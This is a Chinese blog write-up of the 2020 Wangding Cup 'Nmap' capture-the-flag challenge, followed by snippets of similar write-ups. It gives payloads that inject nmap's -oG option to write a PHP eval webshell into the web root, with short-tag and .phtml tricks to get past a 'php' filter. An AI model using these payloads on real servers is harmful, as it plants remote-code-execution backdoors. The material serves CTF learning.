2020/7/15 - [网鼎杯 2020 朱雀组]Nmap - nmap写入webshell

最新推荐文章于 2024-07-27 13:59:36 发布
最新推荐文章于 2024-07-27 13:59:36 发布
阅读量649 收藏 1
点赞数 1
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangxiansheng12/article/details/107357977
版权

文章目录


这个题和前几天做的online tools有异曲同工之妙啊。都是在线工具类的漏洞。 

' <?=eval($_POST[a]);?> -oG 1.phtml '

1. 这个应该也是有那两个函数。

说的是哪两个函数呢?就是escapeshellarg与escapeshellcmd两个函数啦,去我博客里搜这两个关键词应该可以搜得到,
我的博客
然后就是老套路了,先用猜测得payload实验

' <?php eval($_POST["hack"]); ?> -oG hack.php '

然后就提示了
在这里插入图片描述
这种情况不要急,几番猜测下来,是过滤了php。那我们就用phtml啊,然后我们把一句话的代码换成短标签,最终得payload为

' <?=eval($_POST["hack"]); ?> -oG hack.php '

蚁剑一连,然后在主目录下发现flag。

在这里插入图片描述

2.我所犯的错误

我这次复现并不是一开始就是对的,开始的话因为空格和单引号的问题错了几次,就像下面。

在这里插入图片描述
导致这两次没解析成功,后面参考了别人得博客才成功,细节啊。

抒情诗、
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【学习笔记 48】 buu [网鼎杯 2020 朱雀]Nmap
weixin_43553654的博客
08-11 732
0x00 知识点 NMAP中使用-0G命令可以实现代码写入 0x01 解题思路 打开网站一看发现是一个NMAP网站尝试输入输入任意ip 可以看到这里返回了nmap扫描的结果,这里我们就想到了NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件 ' <?php @eval($_POST["cmd"]);?> -oG shell.php ' 尝试后发现报错,说明这里有过滤不能直接进行,最后利用fuzz发现过滤了php,
NSE-scripts:NSE脚本可检测CVE-2020-1350 SIGRED和CVE-2020-0796 SMBGHOST,CVE-2021-21972
05-08
包含自定义NSE脚本 CVE-2020-0796 NSE脚本使用Microsoft ...cp cve-2020-0796.nse /usr/share/nmap/scripts/ nmap --script-updatedb 运行为 nmap -p445 --script cve-2020-0796 <<target>> -- @output -- | smb
[网鼎杯 2020 朱雀]Nmap
pakho_C的博客
07-27 1556
nmap192.168.0.*--exclude192.168.0.100使用“-exclude”选项来排除某些你不想要扫描的主机。nmap-F192.168.0.101快速扫描,仅扫描nmap-services文件中的端口而避开所有其它的端口。nmap-O127.0.0.1使用选项“-O”和“-osscan-guess”也帮助探测操作系统信息。nmap-p80,443192.168.0.101使用“-P”选项指定你想要扫描的端口。...
[网鼎杯 2020 朱雀]Nmap(详细解读版)
最新发布
weixin_73399382的博客
07-27 978
这道题考察nmap的一些用法,以及escapeshellarg和escapeshellcmd两个函数的绕过,可以看这里两种解题方法:第一种通过nmap的-iL参数读取扫描一个文件到指定文件中第二种是利用nmap的参数写入webshell-oN 标准保存-oX XML保存-oG保存-oA 保存到所有格式。
2020-网鼎杯-朱雀-Web-nmap
feng的博客
11-03 825
WP 和BUUCTF里的2018 Online Tool非常类似。 首先就是中是个nmap命令注入,有2个方式: 利用-oG,可以将命令和结果写进文件。 利用-iL 和-oN。其中-iL是从inputfilename文件中读取扫描的目标。在这个文件中要有一个主机或者网络的列表,由空格键、制表键或者回车键作为分割符。如果使用-iL-,nmap就会从标准输入stdin读取主机名字。你可以从指定目标一节得到更加详细的信息,-oN是把扫描结果重定向到一个可读的文件logfilename中。 关于escapesh
BUU-WEB-[网鼎杯 2020 朱雀]Nmap
qq_24033605的博客
05-13 219
[网鼎杯 2020 朱雀]Nmap 先查看主页的源码。 主要功能就是一个网页版的nmap。 //nmap参数: -oN 标准保存 -oX XML保存 -oG Grep保存 -oA 保存到所有格式 -append-output 补充保存文件 通过测试,可以测试出是单引号闭合。 构建payload: ' <?php @eval($_POST[cmd]);?> -oG hack.phtml 回显: hacker 尝试使用短标签绕过。 ' <?= @eval($_POST[cmd]);?&
nmap-7.4-64bit(windows+linux)
02-23
NMAP,也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包。 nmap功能 1.主机发现; //探测存活主机 2.端口扫描; //探测开放端口及端口的服务 3.版本侦测; //探测服务的版本,eg:httpd 1.0 4.OS检测。 /...
端口扫描工具-nmap-7.93
07-23
Nmap(Network Mapper)是一款功能强大的网络扫描和嗅探工具包,它主要用于扫描网上计算机开放的网络连接端口,确定哪些服务运行在哪些端口上,并推断计算机运行的操作系统。Nmap是网络管理员评估网络系统安全的必备...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
[网鼎杯 2020 朱雀]Nmap(namp写webshell)
EC_Carrot的博客
12-20 433
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 这里用到nmapwebshell的技巧,如下代码 ' <?php @eval($_POST["hack"]);?> -oG hack.php ' 这样就能够将一句话写到目录下,再用菜刀或者蚁剑来连,但是这题过滤了php字样,所以标签用短标签,后缀用phtml来绕过 ' <?= @eval($_POST["hack"]);?&
BUUCTF [网鼎杯 2020 朱雀] Nmap
Senimo
12-09 3709
BUUCTF [网鼎杯 2020 朱雀] Nmap 考点:nmap -oG 写入文件、-iL读取扫描文件 解法:将nmap扫描结果写入文件时加入一句话木马 启动环境: 类似Nmap的功能,一个输入命令行,提示输入ip地址,尝试输入正常内容:127.0.0.1 可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令 127.0.0.1 | ls 可以看到|被\转义,尝试使用;: 提示地址错误,尝试了一些其他的命令执行,也无法实现,参考 ...
[网鼎杯 2020 朱雀]Nmap 1
plant1234的博客
04-15 2389
[网鼎杯 2020 朱雀]Nmap 1 首先得到题目打开得到 说是输入houst和IP进行扫描 测试一波:127.0.0.1 得到: 本地测一下nmap 命令得到: 发现效果一样 这里需要知道 nmap 命令将扫描结果保存在文件里面: 例如:将nmap 127.0.0.1的结果保存在test.txt里面 nmap 127.0.0.1 -oN test.txt nmap其他写文件命令: -oN (标准输出) -oX (XML输出) -oS (ScRipT KIdd|3 oUTpuT) -oG (G
[网鼎杯 2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

抒情诗、

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值